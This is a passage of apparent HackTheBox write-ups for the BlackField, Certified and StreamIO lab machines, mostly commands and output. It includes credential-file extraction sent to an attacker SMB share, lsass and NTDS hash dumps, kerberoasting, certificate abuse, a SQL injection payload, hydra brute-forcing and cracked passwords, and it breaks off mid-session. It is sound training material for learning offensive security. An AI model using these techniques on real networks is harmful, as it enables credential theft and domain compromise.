BLACKFIELD569653 BLACKFIELD759079 BLACKFIELD488531 BLACKFIELD160610 BLACKFIELD586934 BLACKFIELD819822 BLACKFIELD739765 BLACKFIELD875008 BLACKFIELD441759 BLACKFIELD763893 BLACKFIELD713470 BLACKFIELD131771 BLACKFIELD793029 BLACKFIELD694429 BLACKFIELD802251 BLACKFIELD602567 BLACKFIELD328983 BLACKFIELD990638 BLACKFIELD350809 BLACKFIELD405242 BLACKFIELD267457 BLACKFIELD686428 BLACKFIELD478828 BLACKFIELD129387 BLACKFIELD544934 BLACKFIELD115148 BLACKFIELD753537 BLACKFIELD416532 BLACKFIELD680939 BLACKFIELD732035 BLACKFIELD522135 BLACKFIELD773423 BLACKFIELD371669 BLACKFIELD252379 BLACKFIELD828826 BLACKFIELD548394 BLACKFIELD611993 BLACKFIELD192642 BLACKFIELD106360 BLACKFIELD939243 BLACKFIELD230515 BLACKFIELD774376 BLACKFIELD576233 BLACKFIELD676303 BLACKFIELD673073 BLACKFIELD558867 BLACKFIELD184482 BLACKFIELD724669 BLACKFIELD765350 BLACKFIELD411132 BLACKFIELD128775 BLACKFIELD704154 BLACKFIELD107197 BLACKFIELD994577 BLACKFIELD683323 BLACKFIELD433476 BLACKFIELD644281 BLACKFIELD195953 BLACKFIELD868068 BLACKFIELD690642 BLACKFIELD465267 BLACKFIELD199889 BLACKFIELD468839 BLACKFIELD348835 BLACKFIELD624385 BLACKFIELD818863 BLACKFIELD939200 BLACKFIELD135990 BLACKFIELD484290 BLACKFIELD898237 BLACKFIELD773118 BLACKFIELD148067 BLACKFIELD390179 BLACKFIELD359278 BLACKFIELD375924 BLACKFIELD533060 BLACKFIELD534196 BLACKFIELD639103 BLACKFIELD933887 BLACKFIELD907614 BLACKFIELD991588 BLACKFIELD781404 BLACKFIELD787995 BLACKFIELD911926 BLACKFIELD146200 BLACKFIELD826622 BLACKFIELD171624 BLACKFIELD497216 BLACKFIELD839613 BLACKFIELD428532 BLACKFIELD697473 BLACKFIELD291678 BLACKFIELD623122 BLACKFIELD765982 BLACKFIELD701303 BLACKFIELD250576 BLACKFIELD971417 BLACKFIELD160820 BLACKFIELD385928 BLACKFIELD848660 BLACKFIELD682842 BLACKFIELD813266 BLACKFIELD274577 BLACKFIELD448641 BLACKFIELD318077 BLACKFIELD289513 BLACKFIELD336573 BLACKFIELD962495 BLACKFIELD566117 BLACKFIELD617630 BLACKFIELD717683 BLACKFIELD390192 BLACKFIELD652779 BLACKFIELD665997 BLACKFIELD998321 BLACKFIELD946509 BLACKFIELD228442 BLACKFIELD548464 BLACKFIELD586592 BLACKFIELD512331 BLACKFIELD609423 BLACKFIELD395725 BLACKFIELD438923 BLACKFIELD691480 BLACKFIELD236467 BLACKFIELD895235 BLACKFIELD788523 BLACKFIELD710285 BLACKFIELD357023 BLACKFIELD362337 BLACKFIELD651599 BLACKFIELD579344 BLACKFIELD859776 BLACKFIELD789969 BLACKFIELD356727 BLACKFIELD962999 BLACKFIELD201655 BLACKFIELD635996 BLACKFIELD478410 BLACKFIELD518316 BLACKFIELD202900 BLACKFIELD767498 BLACKFIELD103974 BLACKFIELD135403 BLACKFIELD112766 BLACKFIELD978938 BLACKFIELD871753 BLACKFIELD136203 BLACKFIELD634593 BLACKFIELD274367 BLACKFIELD520852 BLACKFIELD339143 BLACKFIELD684814 BLACKFIELD792484 BLACKFIELD802875 BLACKFIELD383108 BLACKFIELD318250 BLACKFIELD496547 BLACKFIELD219914 BLACKFIELD454313 BLACKFIELD460131 BLACKFIELD613771 BLACKFIELD632329 BLACKFIELD402639 BLACKFIELD235930 BLACKFIELD246388 BLACKFIELD946435 BLACKFIELD739227 BLACKFIELD827906 BLACKFIELD198927 BLACKFIELD169876 BLACKFIELD150357 BLACKFIELD594619 BLACKFIELD274109 BLACKFIELD682949 BLACKFIELD316850 BLACKFIELD884808 BLACKFIELD327610 BLACKFIELD899238 BLACKFIELD184493 BLACKFIELD631162 BLACKFIELD591846 BLACKFIELD896715 BLACKFIELD500073 BLACKFIELD584113 BLACKFIELD204805 BLACKFIELD842593 BLACKFIELD397679 BLACKFIELD842438 BLACKFIELD286615 BLACKFIELD224839 BLACKFIELD631599 BLACKFIELD247450 BLACKFIELD290582 BLACKFIELD657263 BLACKFIELD314351 BLACKFIELD434395 BLACKFIELD410243 BLACKFIELD307633 BLACKFIELD758945 BLACKFIELD541148 BLACKFIELD532412 BLACKFIELD996878 BLACKFIELD653097 BLACKFIELD438814 svc_backup lydericlefebvre PC01$ PC02$ PC03$ PC04$ PC05$ PC06$ PC07$ PC08$ PC09$ PC10$ PC11$ PC12$ PC13$ SRV-WEB$ SRV-FILE$ SRV-EXCHANGE$ SRV-INTRANET$ lets roast them\nwe got suppport@blackfield.local\nlets crack it\nso we have #00^BlackKnight as the password for the support account\nlets check for password reuse while we enumerate the smb serv\nSMB # we find a buuuunch of profiles\ndrw-rw-rw- 0 Wed Jun 3 12:47:11 2020 AAlleni drw-rw-rw- 0 Wed Jun 3 12:47:11 2020 ABarteski drw-rw-rw- 0 Wed Jun 3 12:47:11 2020 ABekesz drw-rw-rw- 0 Wed Jun 3 12:47:11 2020 ABenzies drw-rw-rw- 0 Wed Ju...... lets check for cred reuse\nnone of them were reusing, please dont be another case of same user same pass, im going to check the bloodhound file i gather first\nExploitation # ok so support can change the password of audit, we will change it and access that forensics share we saw earlier\nwith\n└─$ net rpc password \u0026#34;audit2020\u0026#34; \u0026#34;Password@123\u0026#34; -U \u0026#34;blackfield.local.htb\u0026#34;/\u0026#34;support\u0026#34;%\u0026#34;#00^BlackKnight\u0026#34; -S \u0026#34;blackfield.local\u0026#34; now lets access the share with audit2020:Password@123\nwe have these two members\nso we have a another admin called Ipwn3dyourcompany interesting\ngot thsese hashesh when we used pypykatz to see the dump content for lsass\n== MSV == Username: svc_backup Domain: BLACKFIELD LM: NA NT: 9658d1d1dcd9250115e2205d9f48400d SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c DPAPI: a03cd8e9d30171f3cfe8caad92fef62100000000 Username: Administrator Domain: BLACKFIELD LM: NA NT: 7f1e4ff8c6a8e6b6fcae2d9c0572cd62 SHA1: db5c89a961644f0978b4b69a4d2a2239d7886368 DPAPI: 240339f898b6ac4ce3f34702e4a8955000000000 i passed the hashes and got svc on winrm\nwe can try dumping secrets\nSEBackupPrivilege # On kali create a file called viper.dsh\nwith the content\nset context persistent nowriters add volume c: alias viper create expose %viper% x: unix2dos viper.dsh\ncd c:\\windows\\tasks\npowershell -c iwr -url [http://10.10.10.10/viper.dsh](http://10.10.10.10/viper.dsh) -o viper.dsh or setup smb share, set it up anwyas\nimpacket-smbserver share ./ -smb2support -user test -pass \u0026#39;\u0026#39; and then\ndiskshadow /s viper.dsh robocopy /b x:\\windows\\ntds . ntds.dit reg save hklm\\system c:\\windows\\tasks\\system reg save hklm\\sam c:\\windows\\tasks\\sam net use \\\\10.10.10.10.\\share /user:test copy sam, ntds.dit, system \\\\10.10.10.10\\share and now finally dump it\nimpacket-secretsdump -ntds ntds.dit -system system -sam sam local | tee dmp.txt and we have Administrator hash\nAdministrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DC01$:1000:aad3b435b51404eeaad3b435b51404ee:7f82cc4be7ee6ca0b417c0719479dbec::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3c02561bba6ee4ad6cfd024ec8fda5d::: audit2020:1103:aad3b435b51404eeaad3b435b51404ee:600a406c2c1f2062eb9bb227bad654a lets PTH with this and grab flag\n","date":"6 March 2026","externalUrl":null,"permalink":"/ctf-writeups/blackfield/","section":"CTF Writeups","summary":"","title":"BlackField","type":"ctf-writeups"},{"content":" Certified # Overview # OS: Windows IP: 10.129.231.186 Difficulty: Medium Platform: HackTheBox OSCP: Yes Lists: N/A Summary # got into management_svc by abusing writerowner and genericall, and then exploited ESC9 vuln.\nLoot # Loot Category Details Usernames judith.mader Passwords judith09 Usernames+Passwords Username: judith.mader Password: judith09 Hashes Service Versions Enumeration # Username: judith.mader Password: judith09\nNmap # Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-06 12:34 EST Nmap scan report for 10.129.231.186 Host is up (0.11s latency). Not shown: 989 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 53/tcp open domain (generic dns response: SERVFAIL) | fingerprint-strings: | DNS-SD-TCP: | _services | _dns-sd | _udp |_ local 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-03-07 00:35:07Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: | Subject Alternative Name: DNS:DC01.certified.htb, DNS:certified.htb, DNS:CERTIFIED | Not valid before: 2025-06-11T21:05:29 |_Not valid after: 2105-05-23T21:05:29 |_ssl-date: 2026-03-07T00:36:36+00:00; +7h00m01s from scanner time. 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name) |_ssl-date: 2026-03-07T00:36:35+00:00; +7h00m01s from scanner time. | ssl-cert: Subject: | Subject Alternative Name: DNS:DC01.certified.htb, DNS:certified.htb, DNS:CERTIFIED | Not valid before: 2025-06-11T21:05:29 |_Not valid after: 2105-05-23T21:05:29 3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: | Subject Alternative Name: DNS:DC01.certified.htb, DNS:certified.htb, DNS:CERTIFIED | Not valid before: 2025-06-11T21:05:29 |_Not valid after: 2105-05-23T21:05:29 |_ssl-date: 2026-03-07T00:36:35+00:00; +7h00m01s from scanner time. 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port53-TCP:V=7.95%I=7%D=3/6%Time=69AB1059%P=x86_64-pc-linux-gnu%r(DNS-S SF:D-TCP,30,\u0026#34;\\0\\.\\0\\0\\x80\\x82\\0\\x01\\0\\0\\0\\0\\0\\0\\t_services\\x07_dns-sd\\x04_ SF:udp\\x05local\\0\\0\\x0c\\0\\x01\u0026#34;); Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running (JUST GUESSING): Microsoft Windows 2019|10 (97%) OS CPE: cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_10 Aggressive OS guesses: Windows Server 2019 (97%), Microsoft Windows 10 1903 - 21H1 (91%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-time: | date: 2026-03-07T00:35:56 |_ start_date: N/A |_clock-skew: mean: 7h00m00s, deviation: 0s, median: 7h00m00s | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required TRACEROUTE (using port 139/tcp) HOP RTT ADDRESS 1 114.93 ms 10.10.14.1 2 115.38 ms 10.129.231.186 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 96.61 seconds Roasting # I validated this step using the evidence below before moving forward in the chain.\nSMB 10.129.231.186 445 DC01 [+] certified.htb\\judith.mader:judith09 SMB 10.129.231.186 445 DC01 -Username- -Last PW Set- -BadPW- -Description- SMB 10.129.231.186 445 DC01 Administrator 2024-05-13 14:53:16 0 Built-in account for administering the computer/domain SMB 10.129.231.186 445 DC01 Guest \u0026lt;never\u0026gt; 0 Built-in account for guest access to the computer/domain SMB 10.129.231.186 445 DC01 krbtgt 2024-05-13 15:02:51 0 Key Distribution Center Service Account SMB 10.129.231.186 445 DC01 judith.mader 2024-05-14 19:22:11 0 SMB 10.129.231.186 445 DC01 management_svc 2024-05-13 15:30:51 0 SMB 10.129.231.186 445 DC01 ca_operator 2024-05-13 15:32:03 0 SMB 10.129.231.186 445 DC01 alexander.huges 2024-05-14 16:39:08 0 SMB 10.129.231.186 445 DC01 harry.wilson 2024-05-14 16:39:37 0 SMB 10.129.231.186 445 DC01 gregory.cameron 2024-05-14 16:40:05 0 SMB 10.129.231.186 445 DC01 [*] Enumerated 9 local users: CERTIFIED lets try kerberoasting\nImpacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation --------------------------------- -------------- ------------------------------------------ -------------------------- --------- ---------- certified.htb/management_svc.DC01 management_svc CN=Management,CN=Users,DC=certified,DC=htb 2024-05-13 11:30:51.476756 \u0026lt;never\u0026gt; [-] CCache file is not found. Skipping... $krb5tgs$23$*management_svc$CERTIFIED.HTB$certified.htb/management_svc*$287b2c4e4872bb1c70618d14029a15bd$32c66e46e2c772bbdca57022cf8a818c7b8025714d1ac794319b23136ef7c980e95e1210eef94fc669ac84490fffcb7d2a7f62f1ade005bad90f38b40e87ead8c7f9d967b483ce5aa26e9d1997e43c1ba4e2e06005525fefd314c44893932d5ec7039c6a26a8c4f5fb5e463679d08e25660f27ecc9510f444078414b8d45cea90cc1fbf3dc8b54e516f96cbe4663402a316e6310754c687289d27fc8542a822b8343834ec4e8bb07d86e647460931a0e229427d2ddbf5f999b42a789c815e7a47857b420fabe2fc88d4abc5ec8baac5d3d81043b8a23f6948e22a5eb83d12d5ab2857581e6ab778e7013d35589c67a14da3ee269cca7b2c1ceed08e846e790ef8c0360a48ab9bfffff7face191787a4092d387d109617072e1df4c0b467ff8d57fe7727ec60ab8023b34e92eb1c4f8c09ec953bab0e5ca6a1f8b37fa05ababd6d15580b4bbd89f80f418c2aabde7979118db2cc871bada0effe7bb9680303e08e0c3009936e3dca9617fc75f723e38a703c5a792866a2bad2ad884b8926b55c23b24585d14d052a54ec1b39e3740a0251890f628cb0b5c62dcccef39f7437cac9b80efa8529cdd2b97c4d809278ca6034c943c8eb15228e81ceace9d97c9af09879f5e980960b0859a92d5ea74ee3630c0476f75d7fb4522f297f4abdc614e4b0386570926d8e325b132b27fb60dcc6b8660006fb503bfdbbff3c00f0d366ba940c800c1eab52aaf677d01dbb50c5965ae424c31c64a7476b7cfc23463eead3e92e2aebc7b1b1c99b20abf266072565b940d0553f86023edbd3ae6d8d49ae6a4eb939ab40bd76df40a88e69686ae96e0e307285bdfaa4ad99b366966a0183f69381e81f1445441a67aad12ad496d25cafed726e9006976f5ef3841cf4572acc5f1eba18e8157b40993fb1bc8b5253c4b2d59925f3b7480034fa0a2af7c24b2ac3a34dcd581c5570a9b9dc75c6531710293bef2e5e172edc8748eb0aeebecd132b33714f1ab8aebf59583b3f946e3be78d06a08e9e0405bb02e4f6cbfd51261bbe75c1cc01342ae7546253aff23c40319d69b4e852ac643666185d2f82f4015835d3ca8d5c8604cdd7dca9eee0e706915571a4d3c0a2cc54a4ee4f73c88763fafe90661626c22d25a6aa6a82f0e773dcde45f06ffb6ed94c3832a873983f053e63f84177d4ce2c8771ced26c0f36c485bd48142209977bf106e90d77f92521159f8ff5d5bf68649b058818599a6ff0d9d1d4a4f95fda90c81b1988fc10e5e641682f48b8c51f3401e4ab8b2d302f49936eb1a4081cabdb7ab242bcb73af28397f424f6f42be60b578cf130e825e3f2f8ba64b7b09f8e5a1b24164b3cea221c18ff03305f98965e4f5f5b45e82b995a9138206fd6afe43be1a53c1474f0b0f28a9d21fd0037d8a7dbc9c3efef8498a9a6023693cb6100375fa39e60cf8690b326191587485a162ea3f483c44d2c1c345b2fc6e931df98d9b27f1fe32122f002d21c8989a09e1cdb7499f1759169fb2a27111c55d1e776bc86404588f1960a71b588dea43614bd811387977cb0fca63c4aa3ca93913707a91d3ed7e lets crack this\ncant seem to crack it\nlets check for cred reuse\nand nothing there either\nExploitation # alright so judith has writeowner over this user lets abuse it\nok so the path is clear, we add ourselves to the group and then grab management_svc\n`\ngreat now we can go forth\nCertipy v4.8.2 - by Oliver Lyak (ly4k) [*] Targeting user \u0026#39;management_svc\u0026#39; [*] Generating certificate [*] Certificate generated [*] Generating Key Credential [*] Key Credential generated with DeviceID \u0026#39;0097fa33-afa9-37f8-d31b-18340254044d\u0026#39; [*] Adding Key Credential with device ID \u0026#39;0097fa33-afa9-37f8-d31b-18340254044d\u0026#39; to the Key Credentials for \u0026#39;management_svc\u0026#39; [*] Successfully added Key Credential with device ID \u0026#39;0097fa33-afa9-37f8-d31b-18340254044d\u0026#39; to the Key Credentials for \u0026#39;management_svc\u0026#39; /home/kali/.local/lib/python3.13/site-packages/certipy/lib/certificate.py:233: CryptographyDeprecationWarning: Parsed a serial number which wasn\u0026#39;t positive (i.e., it was negative or zero), which is disallowed by RFC 5280. Loading this certificate will cause an exception in a future release of cryptography. return x509.load_der_x509_certificate(certificate) [*] Authenticating as \u0026#39;management_svc\u0026#39; with the certificate [*] Using principal: management_svc@certified.htb [*] Trying to get TGT... [*] Got TGT [*] Saved credential cache to \u0026#39;management_svc.ccache\u0026#39; [*] Trying to retrieve NT hash for \u0026#39;management_svc\u0026#39; [*] Restoring the old Key Credentials for \u0026#39;management_svc\u0026#39; [*] Successfully restored the old Key Credentials for \u0026#39;management_svc\u0026#39; [*] NT hash for \u0026#39;management_svc\u0026#39;: a091c1832bcdd4677c28b5a6a1295584 we got the nt hash for management wee\ni ahve generic all over ca operator\nlets abuse this aswell\n─(kali㉿kali)-[~/Desktop/Boxes/Certified] └─$ certipy shadow auto -username management_svc@certified.htb -hashes :a091c1832bcdd4677c28b5a6a1295584 -account ca_operator -target certified.htb -dc-ip 10.129.231.186 Certipy v4.8.2 - by Oliver Lyak (ly4k) [*] Targeting user \u0026#39;ca_operator\u0026#39; [*] Generating certificate [*] Certificate generated [*] Generating Key Credential [*] Key Credential generated with DeviceID \u0026#39;735e05fe-c1c8-f829-69a9-ac18e2df0b13\u0026#39; [*] Adding Key Credential with device ID \u0026#39;735e05fe-c1c8-f829-69a9-ac18e2df0b13\u0026#39; to the Key Credentials for \u0026#39;ca_operator\u0026#39; [*] Successfully added Key Credential with device ID \u0026#39;735e05fe-c1c8-f829-69a9-ac18e2df0b13\u0026#39; to the Key Credentials for \u0026#39;ca_operator\u0026#39; /home/kali/.local/lib/python3.13/site-packages/certipy/lib/certificate.py:233: CryptographyDeprecationWarning: Parsed a serial number which wasn\u0026#39;t positive (i.e., it was negative or zero), which is disallowed by RFC 5280. Loading this certificate will cause an exception in a future release of cryptography. return x509.load_der_x509_certificate(certificate) [*] Authenticating as \u0026#39;ca_operator\u0026#39; with the certificate [*] Using principal: ca_operator@certified.htb [*] Trying to get TGT... [*] Got TGT [*] Saved credential cache to \u0026#39;ca_operator.ccache\u0026#39; [*] Trying to retrieve NT hash for \u0026#39;ca_operator\u0026#39; [*] Restoring the old Key Credentials for \u0026#39;ca_operator\u0026#39; [*] Successfully restored the old Key Credentials for \u0026#39;ca_operator\u0026#39; [*] NT hash for \u0026#39;ca_operator\u0026#39;: b4b86f45c6018f1b664f70805f45d8f2 and we have this boom\n┌──(kali㉿kali)-[~/Desktop/Boxes/Certified] └─$ certipy-ad account update -u management_svc -hashes :a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn Administrator -dc-ip 10.129.231.186 Certipy v4.8.2 - by Oliver Lyak (ly4k) [*] Updating user \u0026#39;ca_operator\u0026#39;: userPrincipalName : Administrator [*] Successfully updated \u0026#39;ca_operator\u0026#39; ┌──(kali㉿kali)-[~/Desktop/Boxes/Certified] └─$ certipy req -u ca_operator -hashes :b4b86f45c6018f1b664f70805f45d8f2 -ca certified-DC01-CA -template CertifiedAuthentication -dc-ip 10.129.231.186 Certipy v4.8.2 - by Oliver Lyak (ly4k) [*] Requesting certificate via RPC [-] Got error: The NETBIOS connection with the remote host timed out. [-] Use -debug to print a stacktrace ┌──(kali㉿kali)-[~/Desktop/Boxes/Certified] └─$ certipy-ad req -u ca_operator -hashes :b4b86f45c6018f1b664f70805f45d8f2 -ca certified-DC01-CA -template CertifiedAuthentication -dc-ip 10.129.231.186 Certipy v4.8.2 - by Oliver Lyak (ly4k) [*] Requesting certificate via RPC [*] Successfully requested certificate [*] Request ID is 6 [*] Got certificate with UPN \u0026#39;Administrator\u0026#39; [*] Certificate has no object SID [*] Saved certificate and private key to \u0026#39;administrator.pfx\u0026#39; ┌──(kali㉿kali)-[~/Desktop/Boxes/Certified] └─$ certipy account update -u management_svc -hashes :a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn ca_operator@certified.htb -dc-ip 10.129.231.186 Certipy v4.8.2 - by Oliver Lyak (ly4k) [*] Updating user \u0026#39;ca_operator\u0026#39;: userPrincipalName : ca_operator@certified.htb [*] Successfully updated \u0026#39;ca_operator\u0026#39; ┌──(kali㉿kali)-[~/Desktop/Boxes/Certified] └─$ certipy auth -pfx administrator.pfx -dc-ip 10.129.231.186 -domain certified.htb Certipy v4.8.2 - by Oliver Lyak (ly4k) [*] Using principal: administrator@certified.htb [*] Trying to get TGT... [*] Got TGT [*] Saved credential cache to \u0026#39;administrator.ccache\u0026#39; [*] Trying to retrieve NT hash for \u0026#39;administrator\u0026#39; [*] Got hash for \u0026#39;administrator@certified.htb\u0026#39;: aad3b435b51404eeaad3b435b51404ee:0d5b49608bbce1751f708748f67e2d34 ","date":"6 March 2026","externalUrl":null,"permalink":"/ctf-writeups/certified/","section":"CTF Writeups","summary":"","title":"Certified","type":"ctf-writeups"},{"content":"","date":"6 March 2026","externalUrl":null,"permalink":"/tags/medium/","section":"Tags","summary":"","title":"Medium","type":"tags"},{"content":" StreamIO # Overview # OS: Windows IP: 10.129.1.27 Difficulty: Medium Platform: HackTheBox OSCP: Yes Lists: N/A Summary # This writeup covers the full attack path for StreamIO, including enumeration, exploitation, and privilege escalation.\nLoot # Loot Category Details Usernames Barry Oliver Samantha Johan | | Passwords | | | Usernames+Passwords | | | Hashes | | | Service Versions | |\nEnumeration # Nmap # ─$ nmap 10.129.1.27 -sCV -A -Pn -p- --min-rate=20000 Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-06 05:07 EST Nmap scan report for 10.129.1.27 Host is up (0.11s latency). Not shown: 65516 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 53/tcp open domain (generic dns response: SERVFAIL) | fingerprint-strings: | DNS-SD-TCP: | _services | _dns-sd | _udp |_ local 80/tcp open http Microsoft IIS httpd 10.0 |_http-server-header: Microsoft-IIS/10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-title: IIS Windows Server 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-03-06 17:07:52Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: streamIO.htb0., Site: Default-First-Site-Name) 443/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_ssl-date: 2026-03-06T17:09:29+00:00; +6h59m59s from scanner time. |_http-title: Not Found | ssl-cert: Subject: commonName=streamIO/countryName=EU | Subject Alternative Name: DNS:streamIO.htb, DNS:watch.streamIO.htb | Not valid before: 2022-02-22T07:03:28 |_Not valid after: 2022-03-24T07:03:28 | tls-alpn: |_ http/1.1 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: streamIO.htb0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 9389/tcp open mc-nmf .NET Message Framing 49667/tcp open msrpc Microsoft Windows RPC 49677/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49678/tcp open msrpc Microsoft Windows RPC 49708/tcp open msrpc Microsoft Windows RPC 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port53-TCP:V=7.95%I=7%D=3/6%Time=69AAA788%P=x86_64-pc-linux-gnu%r(DNS-S SF:D-TCP,30,\u0026#34;\\0\\.\\0\\0\\x80\\x82\\0\\x01\\0\\0\\0\\0\\0\\0\\t_services\\x07_dns-sd\\x04_ SF:udp\\x05local\\0\\0\\x0c\\0\\x01\u0026#34;); Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running (JUST GUESSING): Microsoft Windows 2019|10 (97%) OS CPE: cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_10 Aggressive OS guesses: Windows Server 2019 (97%), Microsoft Windows 10 1903 - 21H1 (91%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required |_clock-skew: mean: 6h59m58s, deviation: 0s, median: 6h59m57s | smb2-time: | date: 2026-03-06T17:08:50 |_ start_date: N/A TRACEROUTE (using port 80/tcp) HOP RTT ADDRESS 1 114.53 ms 10.10.14.1 2 114.69 ms 10.129.1.27 OS and Service detection performed. Please report any incorrec Dirbusting # I expanded the attack surface with content discovery and followed only the valid hits.\nPort 80 # Web behavior was the main signal here, so I traced each response change before exploitation.\nwe got Barry,Oliver,Samantha\nfound this with dirbusting\nand this\nExploitation # im not good at sqli at all so im gonna follow ippsecs tutorial on this\nlets use this query\nabcd\u0026#39; union select 1,concat(username,\u0026#39;:\u0026#39;,password),3,4,5,6 from users;-- - we get these hashes\nadmin :665a50ac9eaa781e4f7f04199db97a11` Alexendra :1c2b3d8270321140e5153f6637d3ee53 Austin :0049ac57646627b8d7aeaccf8b6a936f Barbra :3961548825e3e21df5646cafe11c6c76 Barry :54c88b2dbd7b1a84012fabc1a4c73415 $/opt/hashcat-6.2.5/hashcat.bin user-passwords /usr/share/wordlists/rockyou.txt --user -m 0 ...[snip]... $/opt/hashcat-6.2.5/hashcat.bin user-passwords /usr/share/wordlists/rockyou.txt --user -m 0 --show admin:665a50ac9eaa781e4f7f04199db97a11:paddpadd Barry:54c88b2dbd7b1a84012fabc1a4c73415:$hadoW Bruno:2a4e2cf22dd8fcb45adcb91be1e22ae8:$monique$1991$ Clara:ef8f3d30a856cf166fb8215aca93e9ff:%$clara dfdfdf:ae27a4b4821b13cad2a17a75d219853e:dfdfdf Juliette:6dcd87740abb64edfa36d170f0d5450d:$3xybitch Lauren:08344b85b329d7efd611b7a7743e8a09:##123a8j8w5123## Lenord:ee0b8a0937abd60c2882eacb2f8dc49f:physics69i Michelle:b83439b16f844bd6ffe35c02fe21b3c0:!?Love?!123 Sabrina:f87d3c0d6c8fd686aacc6627f1f493a5:!!sabrina$ Thane:3577c47eb1e12c8ba021611e1280753c:highschoolmusical Victoria:b22abb47a02b52d5dfa27fb0b534f693:!5psycho8! yoshihide:b779ba15cedfd22a023c4d8bcf5f2332:66boysandgirls.. lets bruteforce that login page with hydra now\nhydra -C userpass streamio.htb https-post-form \u0026quot;/login.php:username=^USER^\u0026amp;password=^PASS^:F=failed\u0026quot;\nyoshihide works with 66boysandgirls..\nreferring to 0xdfs blog we are able to get rce after parameter fuzzing to find a parameter called debug, which we passed master.php to and used a php filter to retrieve contents of\nwe find this in search.php\n## Query section $connection = array(\u0026#34;Database\u0026#34;=\u0026gt;\u0026#34;STREAMIO\u0026#34;, \u0026#34;UID\u0026#34; =\u0026gt; \u0026#34;db_user\u0026#34;, \u0026#34;PWD\u0026#34; =\u0026gt; \u0026#39;B1@hB1@hB1@h\u0026#39;); $handle = sqlsrv_connect(\u0026#39;(local)\u0026#39;,$connection); if (!isset($_POST[\u0026#39;q\u0026#39;])) and db admin creds in register.php\nletsuse those\nsqlcmd -S localhost -U db_admin -P B1@hx31234567890 -d streamio_backup -Q \u0026#34;select table_name from streamio_backup.information_schema.tables;\u0026#34; and we find this\nPS C:\\\u0026gt; sqlcmd -S localhost -U db_admin -P B1@hx31234567890 -d streamio_backup -Q \u0026#34;select * from users;\u0026#34; sqlcmd -S localhost -U db_admin -P B1@hx31234567890 -d streamio_backup -Q \u0026#34;select * from users;\u0026#34; id username password ----------- -------------------------------------------------- -------------------------------------------------- 1 nikk37 389d14cb8e4e9b94b137deb1caf0612a 2 yoshihide b779ba15cedfd22a023c4d8bcf5f2332 3 James c660060492d9edcaa8332d89c99c9239 4 Theodore 925e5408ecb67aea449373d668b7359e 5 Samantha 083ffae904143c4796e464dac33c1f7d 6 Lauren 08344b85b329d7efd611b7a7743e8a09 7 William d62be0dc82071bccc1322d64ec5b6c51 8 Sabrina f87d3c0d6c8fd686aacc6627f1f493a5 on cracking\n/opt/hashcat-6.2.5/hashcat.bin user-passwords-backup /usr/share/wordlists/rockyou.txt -m0 --user --show nikk37:389d14cb8e4e9b94b137deb1caf0612a:get_dem_girls2@yahoo.com yoshihide:b779ba15cedfd22a023c4d8bcf5f2332:66boysandgirls.. Lauren:08344b85b329d7efd611b7a7743e8a09:##123a8j8w5123## Sabrina:f87d3c0d6c8fd686aacc6627f1f493a5:!!sabrina$ lets winrm now\nevil-winrm -u nikk37 -p \u0026#39;get_dem_girls2@yahoo.com\u0026#39; finding a firefox profile\n*Evil-WinRM* PS 